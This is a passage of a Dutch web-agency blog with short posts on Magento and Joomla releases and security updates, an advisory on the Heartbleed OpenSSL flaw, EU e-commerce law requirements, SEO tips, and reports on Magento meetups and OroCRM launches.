    • Pagina's die Google van lage kwaliteit vind moet je of aanpassen óf weggooien want 1 slechte pagina haalt je hele site qua ranking naar beneden
    • Gebruik Google Authorship, rich snippets, vul alle meta titles, descriptions en alt tags met relevante data
    • Haal alle grammatica- en spelfouten uit teksten maar óók uit je meta data en alt tags
    • Haal links naar websites die Google aanmerkt als Spam of lage kwaliteit weg
    • Gerbuik elke keer andere keywords op pagina's zodat je niet alsmaar dezelfde hebt (keyword stuffing) en gebruik LSI (LSI = Latent Semantic Indexing)
    • Monitor de reacties op je blog, nieuws of productpagina's en zorg ervoor dat deze van goede kwaliteit zijn

    Aanpassen van jouw Magento Webshop

    Natuurlijk kunnen we een analyse voor je uitvoeren wat de impact is voor jouw Magento webshop of Joomla website waarbij we meteen een inschatting maken voor de punten die aangepast dienen te worden. Neem daarvoor contact met ons op door een mailtje te sturen naar support[at]supportdesk.nu of ons formulier in te vullen.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Nieuwe Joomla Roadmap

    Joomla Roadmap met overzicht van releases

    Joomla heeft een nieuwe roadmap voor de komende twee jaar gepubliceerd. In deze roadmap is te lezen welke releases er gepland zijn. Hieronder de opsomming van de belangrijkste vernieuwingen:

    Joomla zal een lichtgewicht CMS gaan worden met ondersteuning voor zogenaamde basis extensies als:

    • Contact
    • Finder
    • Messages
    • Newsfeeds
    • Redirect
    • Search
    • Weblinks

    Overzicht van belangrijkste veranderingen Joomla 3 en hoger

    Het team van Joomla zal de kern van Joomla afslanken door het creëren van:

    • De Joomla Extension Directory (JED) zal dedicated ingezet worden voor de basis extensies waardoor het super makkelijk wordt om ze te installeren. Wanneer je Joomla installeerd worden ze standaard aangeboden.
    • Een speciale Joomla GitHub repository zal worden gebruikt om elke basis extensies individueel te kunnen upgraden, verbeteren en releasen. De verbetering en ondersteuning voor elke extensie zal fluitje van een cent worden.
    • De nieuwe nieuwe ontwikkelingcyclus van Joomla zal helpen om de stabiliteit op lange termijn te kunnen waarborgen alsook ervoor te zorgen dat de compatibiliteit geborgd is. Bij de Minor releases zal het niet meer voorkomen dat er compatibiliteitsporblemen ontstaan en bij Major releases zal dat wel het geval zijn.

    Hieronder de roadmap (met dank aan www.joomlart.com):

    joomla-roadmap
    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Nieuwe e-commerce wet en Magento

    E-commerce wet en Magento

    De nieuwe wet e-commerce van de Europese Unie is op 13 juni van kracht gegaan. Omdat deze wet vooral implicaties heeft op de bestelprocedure en het retourneren van producten zullen we kort hierop ingaan om aan te geven wat mogelijk verandert moet worden aan jouw Magento webshop.

    • Het bestelproces moet voortaan in duidelijke stappen zichtbaar zijn. Een alternatief is een pagina waarop het bestelproces duidelijk omschreven staat.
    • Voordat de bestelling definitief wordt geplaatst moet er een duidelijk overzicht van de ingevulde gegevens en de bestelling worden getoond en moet de consument de mogelijkheid hebben om de ingevulde gegevens te wijzigen.
    • De knop waarmee de klant een bestelling plaatst mag niet meer “verder” of “bestel” heten. De klant moet namelijk akkoord gaan met de tekst “bestelling met betalingsverplichting”. Deze tekst is niet echt makkelijk op een knop te plaatsen. Daarom wordt aangeraden om in het bestelproces bij het punt waarop de klant aanvinkt dat hij akkoord gaat met de algemene voorwaarden de volgende tekst op te nemen: “Als ik op de button ‘Kopen’ klik, bestel ik een product met betaalplicht en ga ik akkoord met de Algemene Voorwaarden.”
    • Het is voortaan wettelijk verplicht om het modelformulier voor herroeping aan te bieden. Het niet verstrekken van dit formulier geeft de consument een verlengde bedenktijd van 12 maanden. Dat wil zeggen dat de consument het product een jaar lang mag houden en dan terug mag sturen. Je kunt in dat geval géén kosten in rekening brengen voor eventuele beschadigingen.
    • De klant heeft voortaan geen 7 dagen maar 14 dagen bedenktijd.
    • Je mag voor betaalmethoden niet meer kosten in rekening brengen/doorberekenen aan de klant dan jij als ondernemer zelf voor de betaalmethode maakt (bijvoorbeeld transactiekosten, abonnementskosten of kosten voor een rembourszegel).
    • Biedt je product zo volledig mogelijk aan door een productomschrijving, plaatje, maat, typenummer, kleur, etc… erbij te zetten.

    Checklijst Magento nieuwe e-commerce wet

    Naast deze 7 hoofdpunten zijn er nog allerlei punten die betrekking hebben op de klantenservice. We hebben een afvinklijst samengesteld waarmee je snel en eenvoudig kunt nagaan of je voldoet aan de nieuwe wet. [pdf] 

    Aanpassen Magento webshop door SupportDesk

    Natuurlijk kunnen we een analyse voor je uitvoeren waarbij we meteen een inschatting maken voor de punten die aangepast dienen te worden. Neem daarvoor contact met ons op door een mailtje te sturen naar support[at]supportdesk.nu of ons formulier in te vullen.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

     

     

  • Meet Magento 2014 recap
    Meet Magento 2014

    De Meet Magento op 21 en 22 mei 2014 was een geweldig succes. Het waren 2 dagen waar veel gepraat, geluisterd en gelachen is. Nieuwe contacten zijn opgedaan, ideeën uitgewisseld en uitdagingen zijn aangegaan.

    meet magento 2014

    Meet Magento Enterprise en Meet Magento Netwerk borrel

    Woensdag was de dag dat er voor de allereerste keer een Magento congres voor solutions partners was georganiseerd. De vraag vanuit de partners was om een platform voor mensen die de intentie hebben om met Magento te gaan werken, op weg te kunnen helpen door voorlichting te geven wat er zoals komt kijken bij het opzetten en beheren van een Magento webshop.

     

    Meet Magento 2014 netwerkborrel


    Aansluitend was de netwerkborrel van Dutchento. 60 á 70 mensen hebben samen gegeten en geborreld. Ook was de internationale garde vertegenwoordigd en werd het een leuke en innoverende avond.

    Meet Magento community presentaties en de Mangento Docters

    Donderdag stond in het teken van Magento Community. Er waren workshops over heel veel uiteenlopende zaken zoals marketing, gebruik van Git, Omnichannel tot “hoe fix ik mijn website?”
    Ook was er, voor de eerste keer, een gehele zaal gewijd aan een product dat gelieerd is aan Magento namelijk OroCRM het nieuwe CRM systeem voor ecommerce en koppeling met Magento.

     

    Meet Magento OroCRM


    Voor de derde keer op rij waren de Magento dokters aanwezig om ter plekken hulp te verlenen aan iedereen die vragen had over Magento. SupportDesk was vertegenwoordigd door Ray Bogman.

    meet magento 2014 magento doctor

    HHVM voor Magento, OroCRM voor ecommerce

    Vanuit SupportDesk werd een presentatie over HHVM gegeven welke i.s.m Byte op Hypernode geïnstalleerd is. Daarnaast was er door SupportDesk een case over de allereerste implementatie van OroCRM Enterprise voor Topdierenshop en de koppeling aan Magento. OroCRM is zo ingericht dat Topdierenshop een uitvoerig overzicht krijgt over abandoned carts, sales orders en nog veel meer.

    Ter afsluiting werd bekend gemaakt dat de Meet Magento 2015 zal plaatsvinden op 27 en 28 mei 2015. Deze zal wederom in, de door de meer dan 600 bezoekers als zeer mooi en futuristisch bestempelde, Utrechtse Jaarbeurs plaatsvinden.

    Tot volgend jaar bij Meet Magento 2015!

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento User Group: Review en Ratings
    magento-user-group-review-ratings-kiyoh

    Afgelopen dinsdag heeft na uitstel (Den Haag Nuke top) de Magento User Group met het thema Magento Reviews en Ratings plaatsgevonden. Als gastspreker was Lasse Bourgonje en Aura Kuipers van KiyOh in het MUG kantoor van SupportDesk en Byte aanwezig.

    Waarom zijn Reviews en Ratings nu zo belangrijk?

    Een standaard Magento webshop maakt gebruikt van product based reviews. Dat wil zeggen dat een klant een reactie achterlaat op de pagina van het aangekochte product. Het proces kan door een extra module geautomatiseerd worden. Deze module zorgt ervoor dat de klant uitgenodigd wordt om een review te geven door een uitnodigings e-mail te laten versturen na een X aantal dagen na het plaatsen van de bestelling. Op deze manier wordt de klant proactief benaderd om een klantervaring achter te laten die ervoor moet zorgen dat andere klanten overtuigd worden om ook de producten te kopen. In onderzoek is nl. aangetoond dat klantervaringen een positieve impact hebben op het koop- en beslissingsproces.

    Naast product based reviews heeft een Magento shop eigenaar ook de mogelijk te kiezen voor webbased reviews. Dit zijn aanbevelingen die niet direct over een product gaan maar over de webshop zelf in combinatie met de levering, klantenservice en dergelijke. Deze algemene beoordelingen worden centraal verzameld door bedrijven zoals Truspilot, eKomi, Feedbackcompany en KiyOh.

    KiyOh is geen onbekende in deze markt met jarenlange ervaring als het gaat om klantreacties. Sinds 2010 beschikt KiyOh al over een gratis Magento module. Deze kan gekoppeld worden aan één of meerdere Magento webshops om zo per winkel of winkelaanzicht (store of storeview) klantervaringen te kunnen verzamelen. De klantreacties kunnen dan via een Magento widget op de webshop geplaatst worden. Eventueel kunnen deze reviews dan verrijkt worden met Rich Snippets. De klantervaringen zullen dan ook in Google te zien zijn. Tevens is KiyOh sinds begin 2014 ook een vaste partner van Thuiswinkelwaarborg geworden en kunnen de leden standaard al vanaf 10 euro hier gebruik van maken.

    Magento User Group nieuwe Topics 2014

    De eerst helft van 2014 zit er weer op. We hebben voor de tweede helft van 2014 al heel veel nieuwe topics ontvangen van onze mede MUG'gers.

    Hierbij het (voorlopige) nieuwe MUG programma:

     

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento 1.9 nu beschikbaar

    Magento Community 1.9Afgelopen week werd het jaarlijk Magento congress Imagine in Las Vegas georganiseerd. Naast de vele presentaties was de bekendmaking van Magento Community Editie 1.9 en Magento Enterprise 1.14 wel het hoogte punt van het event. Met de komt van Magento 1.9 zijn vele bugs opgelost maar ook nieuwe functies toegevoegd. Magento 1.9 is dan ook met recht een mooie aanvulling sinds Magento 1.7 aangezien Magento 1.8 met name een security release was.

    Nieuwe functies binnen Magento 1.9

    • Magento 1.9 heeft een nieuwe "default" theme gekregen, nl. een Reponsive webdesign thema. Het theme genaamd RWD moet de sprong maken naar een gebruikers/mobile vriendelijke webshop.
    • Cross-border Trade is een nieuwe opties special voor de Europeese markt. Met deze opties is het nu eenvoudig om vaste prijzen te handeren binnen de EU los van eventueel BTW verschillen.
    • Standaard support voor PHP 5.4 (PHP 5.3 is nl end-of-life en wordt nl. niet meer supported)
    • Upgrade van het Zend framework (de basis van Magento) naar 1.12.3.

    Magento 1.9 Security verbeteringen

    • Cross-site scripting (XSS) oplossing voor configurabele producten.
    • Toegang tot klantgevens van andere klanten.
    • De flash (swf) image uploader is verwijderd wegens beveiligings issues.
    • Diverse aanpassingen in de checkout systemen van Magento.

    Algemene wijzigingen in Magento 1.9

    • Google Website Optimizer is uitgezet aangezien deze niet meer door Google ondersteund wordt.
    • Indien men Magento in een frame of i-frame gebruikt is nu een optie beschikbaar welke Clickjacking tegengaat.
    • Het default catalog grid is aangepast naar 12 stuks.
    • De shopping cart price rule heeft een extra check voor ingelogde klanten en het gebruik van het aantal per rule.

    Naast deze nieuwe functies en beveiligings aanpassingen zijn er ook veel bugs opgelost.

    Een overzicht van alle bugs en meer details omtrent deze release vind je in de release notes.

    Update:
    Magento CE 1.9.0.1 Release:

    Magento Community Edition heeft een upgrade gehad waarin de volgende onderwerpen zijn opgelost:

    • Klanten kunnen niet langer een coupon gebruiken voor een aankoop vanaf een inactief winkelmandje.
    • Klanten met een smartphone of ander device kunnen nu op subcategorieën inzoomen in de webwinkel met het nieuwe responsieve thema.
    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Ontmoet SupportDesk tijdens Meet Magento 2014
    Meet Magento 2014

    Op 21 en 22 Mei 2014 vindt het jaarlijkse event Meet Magento weer plaats en dit keer in Utrecht. In het Media Plaza komen vooraanstaande Magento developers en Evangalisten sprekers zoals Guido Jansen (Dutchento), Gruus van Woerkom (Byte.nl), Tjitte Folkertsma (MediaCT), Falco van der Maden (Madia), maar ook internationale sprekers zoals, Ivan Chepurnyi, Jary Carter (OroCRM) en Sherrie Rohde. Ook zullen Magento gebruikers elkaar ontmoeten om ervaringen uit te wisselen en kennis op te doen. Omdat er zoveel te doen is hebben de organisatoren betsloten om dit jaar het evenement uit te breiden van 1 naar 2 dagen.

    SupportDesk heeft een aantal sprekers op deze dagen:

    • Donderdag 22 mei om 12.00 uur in de MediaCT zaal: Daniël Sloof – Freelance Magento specialist voor Supportdesk zal spreken over Hiphop Virtual Machine
    • Donderdag 22 mei om 15.30 uur in de PostNL zaal: Ray Bogman - CTO and Co-Founder SupportDesk zal spreken over OroCRM Case – Topdierenshop en integratie met Magento.

    Lees hier meer over de locatie en het programma.

     

    Stel je vraag aan Magento dokter Ray Bogman van Supportdesk donderdag 22 mei

    Ray BogmanOok dit jaar zal, bedenker en initiator van de Magento Doctor's, Ray Bogman met zijn mede doctoren Freek van Deursen (Youwe), Jitze Bakker (MediaCT), Sander Mangel (RedKiwi) weer aanwezig zijn tijdens Meet Magento voor alle vragen omtrent Magento. Heb je hulp nodig laat het ons dan weten. Wij zijn zijn er klaar voor!

    Magento Doctoren Team

     

     

     

    De winnaars van de kaarten voor de Meet Magento 2014

    Jan Bruggink

    Micha Paashuis

     

    Van harte gefeliciteerd! Wij wensen jullie veel plezier op de Meet Magento.

     

    meer info   of   

    Bel nu! 020 337 5961

     

  • Joomla update 3.3, 3.2.4 en 2.5.20
    Joomla 33

    Joomla! heeft 2 nieuwe versies gereleased namelijk 3.3 en 3.2.4 In deze releases zijn nieuwe features en bugs opgelost.

    Wat is er nieuw in Joomla! 3.3?

    In Joomla! 3.3 zijn de volgende nieuwe features geïntroduceerd:

    • Verbeterede opslag van wachtwoorden
    • Microdata ondersteuning (Rich Snippets)
    • Geoptimaliseerde code voor een betere performance
    • MooTools JavaScript code omgezet naar jQuery

    Tevens zijn er meer dan 115 bugs verholpen in Joomla 3.3. Voor een compleet overzicht hiervan ga je naar: Joomla 3-3-0-release-notes

    Wat moet ik doen?

    Er zijn 2 mogelijkheiden:

    1. Wanneer je Joomla! 3.2 op een server hebt draaien met PHP 5.3.10 of hoger raden we je aan om te updaten naar Joomla 3.3.
    2. Wanneer je Joomla! 3.2 op een server hebt draaien met een PHP versie die lager is dan PHP 5.3.10 dan raden we je aan om te updaten naar 3.2.4.

    Joomla 2.5.20 upgrade

    Met de komst van Joomla 3.3.x is er ook een kleine upgrade beschikbaar voor Joomla 2.5.

    Joomla 2.5.20 bevat 5 kleine bug fixes. De release notes zijn hier te vinden.


    Wil je meer informatie of hulp bij het installeren? Wij kunnen je helpen. Kijk bijvoorbeeld eens naar onze Joomla support.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento User Group: Magento Hosting
    Magento User Group: Magento Hosting

    Op donderdag 29 april vond wederom een Magento User Groups (MUG) plaats in Amsterdam. Om 18.30 uur kregen we berichten binnen dat de spoorwegen problemen hadden rond Utrecht en dat het treinverkeer volledig ontregeld was. Vlak daarna bleek het ook op de wegen een rommeltje te zijn met als gevolg dat vele Muggers gestrand waren en niet meer naar Amsterdam konden komen.

    Gelukkig waren een aantal Muggers toch in staat om het verkeer te slim af te zijn en druppelde omstreeks kwart over zeven een aantal binnen en konden we van start.

    Magento Hosting

    Thema van deze MUG was hosting van Magento webshops. Zowel Byte als CloudVPS waren goed vertegenwoordigd. Ray Bogman had een workshop georganiseerd waarbij de Muggers gevraagd werd om op post-its keywords of vragen op te schrijven over hosting. De post-its konden daarna opgehongen worden bij de vooraf opgehangen A4-tjes met hosting termen erop.

    Magento User Group: Magento Managed Hosting

    Discussie

    Nadat iedereen klaar was met de post-its strarte Ray een discussie op over het onderwerp Magento ‘Managed’ hosting. Velen hadden duidelijk een verschillende mening over wat wel en niet onder ‘Managed hosting’ zou moeten vallen. Waar begint en eindigt management? Valt advies over hoe je webshop performed er wel of niet in? Is SEO ook een onderwerp wat bij managed hoort of gaat dat weer te ver? Welke updates worden wel en niet meegenomen in managed?

    Magento User Group: Magento Hosting

    Veel minder discussie was er over Magento ‘Unmanged’ hosting. Hierbij was de mening dat het niet verder zou gaan dan óf een server die geheel zelf ingericht en onderhouden diende te worden tot een kabeltje waarin je een eigen server mag inpluggen.

    De discussie ging daarna verder over naar Magento ‘Shared’ en ‘Unshared’ hosting. Hierbij werd duidelijk dat shared hosting toch wel beperkingen met zich meebracht en dat uiteindelijk een ‘VPS’ of ‘Dedicated’ hosting geprefereerd wordt. Helaas blijkt ook dat niet iedereen altijd de kosten van een ‘VPS’ of ‘Dedicated’ kan opbrengen. Zeker als startende ondernemer is het aan te raden om te beginnen met ‘shared’ hosting maar dan wel een partij die gespecialiseerd is in Magento hosting zodat je gebruik kunt maken van add-ons die door de hosting partij beschikbaar worden gesteld.

    Slot

    De Mug werd afgesloten met een verrassing voor de aanwezige Muggers. Door Byte werden korting tickets weggegeven voor de Meet Magento op 21 en 22 mei in Utrecht. Dit werd met applaus aangenomen. De volgende MUG zal plaatsvinden op dinsdag 27 mei 2014 om 19.00 uur te Amsterdam. Het onderwerp van deze MUG zal zijn: Magento Review and ratings, hoe belangrijk is een goede beoordeling en hoe krijg ik ze?
    Wil je ook mee-muggen? Schrijf je dan in op Magento User Group Amsterdam

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

     

    Magento user group verslag donderdag 29 april 2014

     

    Op donderdag 29 april vond wederom een MUG plaats in Amsterdam. Om 18.30 uur kregen we berichten binnen dat de spoorwegen problemen hadden rond Utrecht en dat het treinverkeer volledig ontregeld was. Vlak daarna bleek het ook op de wegen een rommeltje te zijn met als gevolg dat vele Muggers gestrand waren en niet meer naar Amsterdam konden komen.

    Gelukkig waren een aantal Muggers toch in staat om het verkeer te slim af te zijn en druppelde omstreeks kwart over zeven een aantal binnen en konden we van start.

    Thema van deze MUG was hosting van Magento webshops. Zowel Byte als Cloud VPS waren goed vertegenwoordigd. Ray Bogman had een workshop georganiseerd waarbij de Muggers allemaal bij de verschillende soorten hosting post-it notities konden hangen waarin ze konden aangeven wat ze dachten dat de hosting termen inhielden.

    Een levendige discussie barste los toen het onderwerp ‘Managed’ hosting ter sprake kwam. Velen hadden duidelijk een verschillende mening over wat wel en niet onder ‘Managed hosting’ zou moeten vallen. Waar begint en eindigt management? Valt advies over hoe je webshop performed er wel of niet in? Is SEO ook een onderwerp wat bij managed hoort of gaat dat weer te ver? Welke updates worden wel en niet meegenomen in managed?

    Veel minder discussie was er over ‘Unmanged’ hosting. Hierbij was de mening dat het niet verder zou gaan dan óf een server die geheel zelf ingericht en onderhouden diende te worden tot een kabeltje waarin je een eigen server mag inpluggen.

    De discussie ging daarna verder over naar ‘Shared’ en ‘Unshared’ hosting. Hierbij werd duidelijk dat shared hosting toch wel beperkingen met zich meebracht en dat uiteindelijk een ‘VPS’ of ‘Dedicated’ hosting geprefereerd wordt. Helaas blijkt ook dat niet iedereen altijd de kosten van een ‘VPS’ of ‘Dedicated’ kan opbrengen. Zeker als startende ondernemer is het aan te raden om te beginnen met ‘shared’ hosting maar dan wel een partij die gespecialiseerd is in Magento hosting zodat je gebruik kunt maken van add-ons die door de hosting partij beschikbaar worden gesteld.

    De Mug werd afgesloten met een verrassing voor de aanwezige Muggers. Door Byte werden korting tickets weggegeven voor de Meet Magento op 21 en 22 mei in Utrecht. Dit werd met applaus aangenomen.

    De volgende MUG zal plaatsvinden op dinsdag 27 mei 2014 om 19.00 uur te Amsterdam. Het onderwerp van deze MUG zal zijn: Review and ratings, hoe belangrijk is een goede beoordeling en hoe krijg ik ze?

    Wil je ook mee-muggen? Schrijf je dan in op Magento User Group Amsterdam [http://www.meetup.com/Magento-user-Group-Amsterdam/]. 

  • Groot beveiligingslek in SSL

    SSL beveiligingslek heartbleed

    Gisterenavond is bekend gemaakt dat er een groot beveiligingslek is aangetroffen in SSL (genaamd Heartbleed). Het betreft de versies:

    • OpenSSL 1.0.1 tot en met 1.0.1f

    De volgende versies hebben GEEN probleem en zijn veilig:

    • OpenSSL 1.0.1g
    • OpenSSL 1.0.0 branch
    • OpenSSL 0.9.8 branch

    Wat is het risico?

    Via het lek is het mogelijk een inkijkje in het geheugen te nemen en is van alles te achterhalen, tot en met de sleutels die worden gebruikt om gebruikersnamen, wachtwoorden en versleutelde e-mail te oncijferen.

    Dit lek is om twee redenen extra ernstig:

    1. Ten eerste laat een aanvaller geen sporen achter; er is dus geen methode om vast te stellen of men slachtoffer is geweest van dit type aanval. Als men erop bedacht is, kan men zijn intrusion detection-systeem wel programmeren om misbruik van het lek te herkennen. Maar zelfs dan is het volgens de vinders ondoenlijk om het uitlezen te voorkomen. Men kan ook niet zien of in het verleden een hack is geweest en de sleutels al bemachtigd zijn.

    2. Het lek staat al open sinds 14 maart 2012 en dus is de kans aanwezig dat een hack heeft plaatsgevonden. Alleen een patch installeren is niet afdoende. De patch helpt alleen tegen toekomstige pogingen het lek te misbruiken. Mocht een aanvaller bij een hack langs deze weg al sleutels hebben bemachtigd, dan blijven die ook na het aanbrengen van de patch bruikbaar. De patch dicht alleen het gat in OpenSSL. Om het probleem echt te verhelpen, zou de uitbater van de website zijn certificaten moeten wijzigen, zodat de eventueel bemachtigde encryptiesleutels onwerkbaar worden.

    Wat moet ik doen?

    Wij raden onze klanten aan om de patch te installeren en zo mogelijk een het SSL certificaat te wijzigen. Mocht u niet weten welke versie u heeft dan kunnen we u helpen. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    Meer informatie

    Voor meer informatie kunt u de volgende artikelen lezen:

        www.automatiseringgids.nl/nieuws/2014/15/gapend-gat-in-ssl-beveiliging-gevonden
        heartbleed.com

    Byte klanten

    Mocht u klant van Byte zijn dan hoeft u geen actie te ondernemen. Lees hier meer over op de website van Byte: www.bytenoc.nl/150-onderhoud-update-preventief-updaten-ssh-host-certificaten-en-herstarten-webservices.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • OroCRM 1.0.0 nu beschikbaar

    OroCRM 1.0.0 [stable] is sinds vandaag beschikbaar. Na ruim 1 jaar hard werken is het Oro team er in geslaagd de geplande deadline te halen van 1 April. Veel grappen zijn hier al maanden over gemaakt of dit wel klopt aangezien het vandaag nl. 1 april is. 

    OroCRM release notes

    Een kleine update wat we tegen kwamen in deze OroCRM 1.0.0 release.Workflows zijn een integraal onderdeel van de OroCRM ervaring en van iedere Business Application. Voorafgaand aan deze release, kon workflow creatie en configuratie alleen gedaan worden door ontwikkelaars met behulp van de configuratiebestanden. Met deze release introduceren we de eerste generatie GUI tool die u toelaat om nieuwe workflows te creëren en te beheren een aantal van de kenmerken van aangepaste workflows en vermindert de afhankelijkheid van ontwikkelaars.

    Deze versie bevat de volgende functies :

    1. Taken maken en deze toewijzen aan gebruikers
    2. Ingebouwde takenlijst sidebar widget die een lijst met geopende taken
    3. Verbeterde gebruikersinterface voor de lancering van het verkoopproces workflow
    4. Toegang tot de lijst van alle werkstromen die momenteel bestaan ​​in het systeem. Merk op dat " systeem" of ingebouwde workflows niet kunnen worden bewerkt , maar kan worden gekloond
    5. Activeren en deactiveren workflows
    6. Maak een compleet nieuwe workflow of kloon en een bestaande aanpassen
    7. Geef stappen van de workflow en hun relatieve posities in de workflow
    8. Overgangen toe te voegen aan de workflow

     Meer info volgt zodra deze beschikbaar is.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento patch voor PHP 5.4

    magento-upgradeMagento ondersteund sinds kort PHP 5.4. Dit betekent dat Magento webshops die nu nog onder PHP 5.3 werken overgezet kunnen worden naar PHP 5.4.

    PHP 5.4. heeft als voordeel dat de prestaties verbeterd zijn, het geheugen wordt efficiënter gebruikt en de security is geupdate.
    Op Magento is de patch te downloaden en staan instructies over de installatie.

    Wilt u meer informatie of kunnen we u helpen uw Magento webshop te updaten bel ons dan of stuur ons een e-mail.

    NB; PHP heeft onlangs een security release uitgebracht 5.4.26. Wij raden onze klanten aan om deze update te installeren. Meer informatie hierover is te vinden op php.net.

     

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Joomla Security Update 2.5.19 en 3.2.3

    securityreleaseGisteren heeft het Joomla! Project twee upgrades uitgebracht, namelijk Joomla! 2.5.19 en Joomla! 3.2.3. Het betreft hier een Joomla Security release. Naast de 3 Joomla Security (high en Medium security) aanpassingen zijn tevens 40 bugs gefixed. Heb je een Joomla! 2.5.x of 3.x versie, dan raden wij aan zo spoedig mogelijk te updaten.

    Joomla! 3.2.3

    Joomla! 3.2.3. bevat een aantal nieuwe handige features. Waaronder:

    • Security Issues Fixed
    • Hoge prioriteit - Core SQL Injection
    • Gemiddelde prioriteit - Core XSS Vulnerability
    • Gemiddelde prioriteit- Core XSS Vulnerability

    Meer informatie over deze release vind je op de website van Joomla!.

    Joomla! 2.5.19

    Ook voor de Joomla! 2.5. is er een Security Release uitgebracht Joomla! 2.5.19. We raden u aan uw Joomla 2.5.x te upgraden naar deze versie.

    Joomla! 2.5.19 bevat de volgende verbeteringen:

    • Registratie email voor meertalige websites
    • Gemiddelde prioriteit - Core - XSS Vulnerability
    • Gemiddeldeprioriteit - Core - XSS Vulnerability

    De specifieke bug fixes zijn terug te vinden in de release notes van Joomla! 2.5.19.

    Omdat dit een security release is, raden we onze klanten sterk aan direct te upgraden!

    meer info   of   

    Bel nu! 020 337 5961

     

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Joomla Update versie 2.5.18

    Joomla 2.5Vandaag is er een nieuwe versie van Joomla 2.5 vrijgegeven: Joomla 2.5.18. We raden u aan uw Joomla 2.5.x te upgraden naar deze versie.

    Joomla 2.5.18 bevat de volgende verbeteringen:

    • Artikelen ontbraken voor beheerders op de frontend is opgelost
    • Wanneer men in de voorpagina klikte op de titel verdwenen de modules uit het zicht
    • Wachtwoorden opslaan via PHPass uit Joomla 3.2.x is nu ook beschikbaar in Joomla 2.5.x

    De specifieke bug fixes zijn terug te vinden in de release notes van Joomla! 2.5.18.

    Omdat dit een maintenance release is, raden we onze klanten sterk aan direct te upgraden!

    meer info   of   

    Bel nu! 020 337 5961

     

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • OroCRM 1 April Live

    Afgelopen 18 februari stond de Magento User Group Amsterdam (MUG) in het teken van Magento en externe koppelingen. Een van de koppelingen was het veel belovende pakket OroCRM - CRM voor e-commerce welke gemaakt is door voormalige Magento medewerkers zoals Yoav Kutner (ex-CTO Magento) en Dima Soroka (ex-Lead Architect Magento).

    Magento User Group - OroCRM

    Live sessie met Yoav en Jary

    Tijdens de Magento User Group haden we een live videofeed met Los Angeles waar Yoav Kutner en Jary Garter ons de laatste ins-en-outs omtrent OroCRM gaf.

    Inmiddels is de huidige OroCRM versie al ruim 4000 keer gedownload en heeft de website 80.000 bezoekers gehad.

    OroCRM is de e-commerce oplossing voor het koppelen met Magento en later met: Shopify, ATG, Oxid, Prestashop, Demandware, Amazon, eBay, Microsoft en willicht in de toekomst ook Joomla!.

    Andere belangrijk punten welke OroCRM zo sterk maken zijn:

    • Uitval winkelmandje monitoren
    • Overzichtelijk besteloverzicht en follow-up
    • Oro is de ideale marketing tool
    • Centraal klant overzicht van meerdere kanalen
    • Klant gerichte marketingstrategie
    • Click-and-Go reports
    • Easy Dashboard widgets
    • Centraal verkoopoverzicht en beheer
    • Oro is eenvoudig als ontwikkelaar aan te vullen
    • Oro Platform als basis
    • 100% Open Source
    • Oro Marketplace

    OroCRM 1.0.0 - 1 April beschikbaar

    Na bijna een jaar wachten wordt ons geduld beloond met de komst van OroCRM 1.0 1 in April 2014.
    Deze release zal net zoals bij Magento destijds met open armen ontvangen worden door zowel developers als de business.
     

    Eerste OroCRM Training in Eindhoven

    Onlangs is er een OroCRM training geweest in Eindhoven. Dit was een besloten training voor een klein clubje partners die als eerste met Oro aan de slag gaan.

    Vladimir Kerkhoff en Ray Bogman van SupportDesk waren hier ook bij. De twee OroCRM trainingdagen bevatte een business dag en een developers dag. Tijdens beide dagen hebben wij een goed beeld gekregen van de mogelijkheden van OroCRM en wat deze voor de business betekenen.

     

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

     

  • Magento support: is een verhaal apart

    magento-support

